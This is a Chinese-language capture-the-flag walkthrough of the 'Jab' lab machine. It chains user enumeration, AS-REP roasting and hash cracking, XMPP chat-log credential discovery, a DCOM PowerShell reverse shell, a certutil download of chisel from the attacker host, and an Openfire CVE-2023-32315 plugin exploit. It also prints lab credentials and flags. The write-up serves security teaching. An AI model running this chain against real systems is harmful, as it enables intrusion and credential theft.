XMPP协议渗透测试实战：Jab靶机攻防教学<\/h1>

环境准备<\/h2>

目标信息<\/h3>

靶机IP: 10.10.11.4<\/li>
域名: DC01.jab.htb, jab.htb<\/li>

主要服务: XMPP (端口5269)<\/li> <\/ul>

工具安装<\/h3>

Pidgin安装<\/strong>:<\/li> <\/ol>
sudo apt install pidgin <\/span><\/span><\/code><\/pre>Pidgin是一款支持XMPP等多种协议的跨平台即时通讯客户端。<\/p> Kerbrute安装<\/strong>:<\/li> <\/ol> sudo apt install golang-go <\/span><\/span>wget https:\/\/github.com\/ropnop\/kerbrute\/releases\/download\/v1.0.3\/kerbrute_linux_amd64 <\/span><\/span>chmod 777<\/span> kerbrute_linux_amd64 <\/span><\/span><\/code><\/pre> Impacket安装<\/strong>:<\/li> <\/ol> git clone https:\/\/github.com\/fortra\/impacket.git <\/span><\/span>cd impacket <\/span><\/span>sudo python3 setup.py install <\/span><\/span><\/code><\/pre> SecLists安装<\/strong>:<\/li> <\/ol> sudo apt install seclists <\/span><\/span><\/code><\/pre>信息收集<\/h2> 初始扫描<\/h3> nmap -p- 10.10.11.4 --min-rate 1000<\/span> -sV -sC <\/span><\/span><\/code><\/pre>域名解析配置<\/h3> 将以下内容添加到\/etc\/hosts<\/code>文件:<\/p> 10.10.11.4 DC01.jab.htb jab.htb <\/code><\/pre> 用户枚举<\/h2> 方法1: Kerbrute枚举<\/h3> .\/kerbrute_linux_amd64 userenum --dc dc01.jab.htb -d jab.htb \/usr\/share\/seclists\/Usernames\/xato-net-10-million-usernames.txt -o recore.log <\/span><\/span>grep -oP '\S+(?=@jab\.htb)'<\/span> recore.log | sort | uniq > User.txt <\/span><\/span><\/code><\/pre>方法2: Pidgin枚举<\/h3> 启动Pidgin调试模式:<\/li> <\/ol> sudo pidgin -d > recore.log <\/span><\/span><\/code><\/pre> 在Pidgin中: Accounts -> name@jab.htb<\/li> Search for Users -> Search Directory -> Advanced User Search (使用*<\/code>作为表达式)<\/li> <\/ul> <\/li> 提取用户:<\/li> <\/ol> grep -oP '<value>\K[^<]+@jab.htb(?=<\/value>)'<\/span> recore.log | sed 's\/@jab.htb\/\/g'<\/span> | sort | uniq > User.txt <\/span><\/span><\/code><\/pre>AS-REP Roasting攻击<\/h2> 获取用户哈希<\/h3> GetNPUsers.py jab.htb\/ -usersfile User.txt -format hashcat -outputfile hashes <\/span><\/span><\/code><\/pre>哈希破解<\/h3> hashcat --force -m 18200<\/span> hashes \/usr\/share\/wordlists\/rockyou.txt <\/span><\/span><\/code><\/pre>成功获取凭据:<\/p> 用户名: jmontgomery<\/li> 密码: Midnight_121<\/li> <\/ul> XMPP渗透<\/h2> 使用Pidgin登录<\/h3> 添加账户: 协议: XMPP<\/li> 用户名: jmontgomery@jab.htb<\/li> 密码: Midnight_121<\/li> Advanced页面: 填写靶机IP<\/li> <\/ul> <\/li> 勾选"创建用户"复选框并保存<\/li> <\/ol> 获取更多凭据<\/h3> 加入聊天室查看历史记录<\/li> 发现特权用户凭据: 用户名: svc_openfire<\/li> 密码: 1qazxsw<\/li> <\/ul> <\/li> <\/ol> 横向移动<\/h2> DCOM协议利用<\/h3> dcomexec.py -object MMC20 jab.htb\/svc_openfire:1qazxsw@10.10.11.4 'powershell -e <base64_encoded_payload>'<\/span> <\/span><\/span><\/code><\/pre>使用revshells.com<\/a>生成PowerShell Base64编码的反向Shell。<\/p> 获取User Flag<\/h3> type c:\Users\svc_openfire\Desktop\user.txt <\/span><\/span><\/code><\/pre>User Flag: 157af72bc853083562ace527d2a1c16f<\/code><\/p> 权限提升<\/h2> 端口发现<\/h3> netstat -ant | findstr LISTENING <\/span><\/span><\/code><\/pre>发现9090端口运行本地Web服务。<\/p> 端口转发<\/h3> 下载Chisel:<\/li> <\/ol> wget https:\/\/github.com\/jpillora\/chisel\/releases\/download\/v1.9.1\/chisel_1.9.1_linux_amd64.gz <\/span><\/span>wget https:\/\/github.com\/jpillora\/chisel\/releases\/download\/v1.9.1\/chisel_1.9.1_windows_amd64.gz <\/span><\/span>gzip -d chisel_1.9.1_*.gz <\/span><\/span>chmod +x chisel_1.9.1_linux_amd64 <\/span><\/span>mv chisel_1.9.1_windows_amd64 chisel.exe <\/span><\/span><\/code><\/pre> 启动服务端:<\/li> <\/ol> .\/chisel_1.9.1_linux_amd64 server --port 9088<\/span> --reverse <\/span><\/span><\/code><\/pre> 客户端连接:<\/li> <\/ol> certutil.exe -urlcache -f<\/span> http:<\/span>\/\/<kali_ip>\/chisel.exe chisel.exe <\/span><\/span>.\chisel.exe client <kali_ip>:<\/span>9088 R:9090:<\/span>127.0.0.1:<\/span>9090 <\/span><\/span><\/code><\/pre>Openfire漏洞利用(CVE-2023-32315)<\/h3> 下载漏洞利用代码:<\/li> <\/ol> git clone https:\/\/github.com\/tangxiaofeng7\/CVE-2023-32315-Openfire-Bypass.git <\/span><\/span>cd CVE-2023-32315-Openfire-Bypass <\/span><\/span>sudo apt install maven <\/span><\/span>mvn clean package <\/span><\/span><\/code><\/pre> 上传插件: 访问http:\/\/localhost:9090<\/li> 使用svc_openfire凭据登录<\/li> 上传生成的org.jivesoftware.openfire.plugin.CVE-openfire-plugin-assembly.jar<\/code><\/li> <\/ul> <\/li> 获取Shell: 访问Server -> Server Settings -> Shell Plugin<\/li> 密码: 123<\/li> 执行反向Shell命令<\/li> <\/ul> <\/li> <\/ol> 获取Root Flag<\/h3> type <root_flag_path> <\/span><\/span><\/code><\/pre>Root Flag: 07c41b2d1d2936af484acbc6b6c564af<\/code><\/p> 关键知识点总结<\/h2> XMPP协议<\/strong>: 开放式的实时通信协议，常用于即时消息系统<\/li> Kerberos攻击<\/strong>: AS-REP Roasting攻击无预授权用户<\/li> DCOM协议<\/strong>: 微软的分布式组件对象模型，可用于远程命令执行<\/li> Openfire漏洞<\/strong>: CVE-2023-32315允许认证绕过和RCE<\/li> 端口转发<\/strong>: 使用Chisel进行内网端口转发<\/li> 凭证重用<\/strong>: 在聊天记录中发现的凭据可用于横向移动<\/li> <\/ol> 通过本案例，我们学习了从XMPP服务入手，通过用户枚举、AS-REP Roasting攻击、DCOM协议利用和Openfire漏洞利用等一系列技术，最终获取系统完全控制权的完整过程。<\/p>